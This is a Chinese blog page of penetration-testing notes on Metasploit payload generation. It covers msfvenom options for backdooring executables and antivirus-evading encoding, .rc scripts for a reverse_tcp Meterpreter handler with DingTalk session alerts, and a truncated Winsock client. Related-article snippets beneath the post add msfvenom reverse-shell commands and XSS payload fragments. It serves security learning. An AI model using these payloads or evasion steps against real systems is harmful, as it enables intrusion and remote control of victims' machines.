Payload笔记

最新推荐文章于 2025-10-25 11:47:14 发布
原创 最新推荐文章于 2025-10-25 11:47:14 发布 · 2.6k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#udp

本文深入探讨了渗透测试工具Metasploit的使用,包括payload生成、自动化脚本编写以及利用Dingding推送信息。同时,解释了shellcode的工作原理,并给出了C和Python的实现示例。接着,介绍了shellcode的多种加载方式,以及杀毒软件的基本原理和查杀策略。最后,讨论了如何在Metasploit中使用HTTPS监听和ngrok进行隐蔽通信,并阐述了如何在Meterpreter与CS之间转换payload以规避检测。

一.payload生成

msf:

  1. –p (- -payload-options)
    添加载荷payload。
  2. –l
    查看所有payload encoder nops。
  3. –f (- -help-formats)
    输出文件格式。
  4. –e
    编码免杀。
  5. –a (- -platform – -help-platforms)
    选择架构平台
    x86 | x64 | x86_64
  6. –o
    文件输出。
  7. –s
    生成payload的最大长度,就是文件大小。
  8. –b
    避免使用的字符 例如:不使用 ‘\0f’。
  9. –i
    编码次数。
  10. –c
    添加自己的shellcode。
  11. –x | -k
    捆绑。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。推荐用back door factory工具,但最好会汇编

msf可以写自动化脚本.rc,类似.bat和.sh,把想执行的任务写完,通过钉钉推送机器上线的信息

msf:

用法: msf -r xxx.rc

dingding.rc:

load session_notifier
set_session_dingtalk_webhook https://oapi.dingtalk.com/robot/send?
access_token=xxx
start_session_notifier

test.rc

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.xxx.xxx
exploit

二.shellcode的基本原理-socket编程

C:

#include <WinSock2.h>
#include <stdio.h>
#include <tchar.h>
#include <string.h>

#define SERVER_PORT 3333 //服务器端口号
#define BUFF_SIZE 1024
#pragma comment(lib, "WS2_32.lib")
int _tmain(int argc, _TCHAR* argv[])
{
   
   
	//加载套接字库
	WORD wVersionRequested;
	WSAData wsaData;
	int err;
	printf("This is a Client side application!\n");
	wVersionRequested = MAKEWORD(2, 2);
	err = WSAStartup(wVersionRequested, &wsaData);
	if(err != 0) {
   
   
		//Tell the user that we could not find a usable WinSock Dll.
		printf("WSAStartup() called failed!\n");
		return -1;
	} else {
   
   
		printf("WSAStartup called successful!\n");
	}
	if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2) {
   
   
	//Tell the user that we could not find a usable WinSock Dll.
		WSACleanup();
		return -1;
}
	//The WinSock Dll is acceptable. Proceed
	//创建套接字
	SOCKET sockClient = socket(AF_INET, SOCK_STREAM, 0);
	if(sockClient == INVALID_SOCKET) {
   
   
		printf("socket() called failed!, error code is %d\n",WSAGetLastError());
		return -1;
	} else {
   
   
		printf("socket() called successful!\n");
	}
	//需要连接的服务端套接字结构信息
	SOCKADDR_IN addrServer;
	//设定服务器IP
	addrServer.sin_addr.S_un.S_addr = inet_addr("192.168.199.129");
	addrServer.sin_family = AF_INET;
	//设定服务器的端口号(使用网络字节序)
	addrServer.sin_port = htons
最低0.47元/天 解锁文章
生成 Payload 的过程(Python)
JieLun_C的博客
09-08 1777
在网络安全领域中,Payload 是指在利用漏洞或攻击目标时所使用的特定数据或代码块。生成 Payload 的过程通常涉及构造恶意代码、利用漏洞或设计特定的数据结构。本文将介绍使用 Python 生成 Payload 的一般步骤,并提供相应的源代码示例。生成 Payload 是一个复杂且技术密集的过程,需要深入了解相关的漏洞和攻击技术。然后,我们使用 UTF-8 编码将 Payload 转换为字节流,并打印生成的 Payload。根据 Payload 的目标和用途,需要构造特定的数据结构来实现所需的功能。
xss的各种payload脚本
08-12
xss 各种绕waf脚本语句
Java反序列化生成Payload附利用脚本
02-12
Java反序列化生成Payload附利用脚本,帮助运维测试weblogic及jboss等中间件的漏洞。
【干货分享】远程入侵控制安卓手机实战,一文详解!
最新发布
logic1001的博客
10-25 1113
共同研发的的网安视频教程,内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。如果我们的手机与使用的计算机处在同一局域网,但是虚拟机使用的是NAT模式。(设置之后,凡是发往计算机9999端口的流量都会转发到虚拟机的9999端口上,这样虚拟机就能够接收到Android的连接了)如果使用上面ANT端口映射的话,那么创建的payload就不能够使用虚拟机的IP地址,而只能使用计算机的IP地址。
【XSS】payload 常用构造和变形方法
吉吉的博客
03-06 6882
XSS 相关 payload 构造和变形的常用方法。
python 生成payload_Payload生成脚本(命令执行,XSS,奇葩等价变形等)
weixin_33301547的博客
02-09 702
import sysfrom getopt import getoptdef notx(payload):a=''retval=""for x in payload:a=''for bi in '0'*(8-len(format(ord(x),'b')))+format(ord(x),'b'):k='1' if bi=='0' else '0'a=a+kretval=retval+'%'+form...
payload的使 常用xss_编写自己的xss payload
weixin_39942488的博客
12-20 221
[AppleScript] 纯文本查看 复制代码var request=false;if(window.XMLHttpRequest){request=new XMLHttpRequest();if(request.overrideMimeType){request.overrideMimeType('text/xml');}}else if(window.ActiveXObject){var v...
精选资源
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
在这个例子中,payload可能是一个精心设计的序列化字符串,当`unserialize()`函数被调用时,它会执行预期的代码。 PHP的反序列化漏洞常常与自定义类的魔法方法(如`__wakeup()`和`__destruct()`)相关。这些方法在...
【渗透测试笔记】之【MSF 生成payload】_msf payload 生成c++
2401_84968665的博客
05-13 431
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
PCIe学习笔记之Max payload size
热门推荐
Hober
07-01 3万+
Max payload size和max read request size 1. 概述 1.1 max payload size 1.2 max read request size 1.3 两者的关系 Max payload size对性能的影响 改变max payload size的大小 2. 内核实现
【CS学习笔记】5、如何建立Payload处理器
TeamsSix 的 CSDN 空间
04-25 1065
这一小节学起来感觉有些吃力,里面很多概念理解的不是很清楚,如果有大佬看到描述错误的地方欢迎留言指正,避免误导他人。 再次声明,这只是我的个人学习笔记,不要当成教程去看,建议想学习CS的小伙伴可以看看A-TEAM的中文手册或者网上的一些视频教程。 0x00 监听器管理 什么是监听器 顾名思义,监听器就是等待被入侵系统连接自己的一个服务。 监听器的作用 主要是为了接受payload回传的各类数...
通过脚本工具实现payload的免杀功能
Mark的博客
09-02 428
声明:本项目作者并非本人,该项目作者为本人好友 Github开源源代码链接: 项目. Github开源源代码链接: exe下载链接. 本项目可结合CS进行一个免杀处理 介绍: ZheTian Powerful remote load and execute ShellCode tool 免杀shellcode加载框架 命令详解 -u:从远程服务器加载base64混淆后的字节码。 -r:从本地文件内读。 -s:读取无修改的原始文件,只能从本地加载 -o:参数为tru自动向启动项添加自启模块。 -n:向
创建Metasploit Payloads
一个码农的笔记
01-31 1468
Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give y
XSS|跨站脚本攻击payload集合
qq_60115503的博客
05-09 5971
跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r sprintf die var-dump var_export. #Alert Payload <s
xss攻击突破转义_XSS 跨站脚本攻击总结
weixin_39881802的博客
11-21 664
漏洞起因可以输入的地方没有做好对应的过滤,引发的xss攻击漏洞危害盗取cookie劫持用户浏览器钓鱼攻击挂马在一定的条件下可以getshell会话劫持漏洞类型反射型XSS(危险级别:低),插入的语句停留在当前页面。DOM型XSS (危险级别:中), DOM型xss又分为两种 (a.可见型、b.不可见型),插入的语句影响js 。存储型XSS(危险级别:高),插入的语句保存在数据库 。其他型XSS(例...
payload模块使用(四)
weixin_43047908的博客
03-20 2770
介绍几种常见的payload,并且以漏洞利用的角度探讨它们的功能 bind shell   bind(绑定型)shell用于提供远程shell连接。在成功利用了目标主机上的安全漏洞后,并且成功执行了shellcode程序以后,渗透人员可在目标主机上的特定端口上运行bind shell,以让其他主机继续控制这台主机。攻击人员可以使用基于TCP连接的标准输入输出隧道工具(例如Netcat)连接带被攻破的主机,通过bind shell继续实施控制。它的应用场合与Telnet服务器/客户端十分相似,主要适用于以NA
记录今日学习--FTP嗅探与简易制作Payload
weixin_44515089的博客
02-26 410
FTP暴力破解密码 首先建立账户,使用 net user username password /add 建立用户 然后 net localgroup administrators username /add 将用户加入管理员组 在FTP站点中加入新建立的用户,允许其远程登陆—服务器准备工作配置完毕 在kali中下载medusa // 使用 sudo apt-get insta...
python 生成payload_msf下的各种生成payload命令
weixin_35432846的博客
01-14 492
msf下的各种生成payload命令List payloadsmsfvenom -lBinaries:Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT...
dify笔记
04-01
### Dify 笔记简介 Dify 是一款新兴的个人知识管理和生产力提升工具,其设计理念与思源笔记相似,专注于提供灵活的内容组织方式以及强大的跨平台支持[^1]。该工具同样采用了块状编辑模式,允许用户以模块化的方式...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值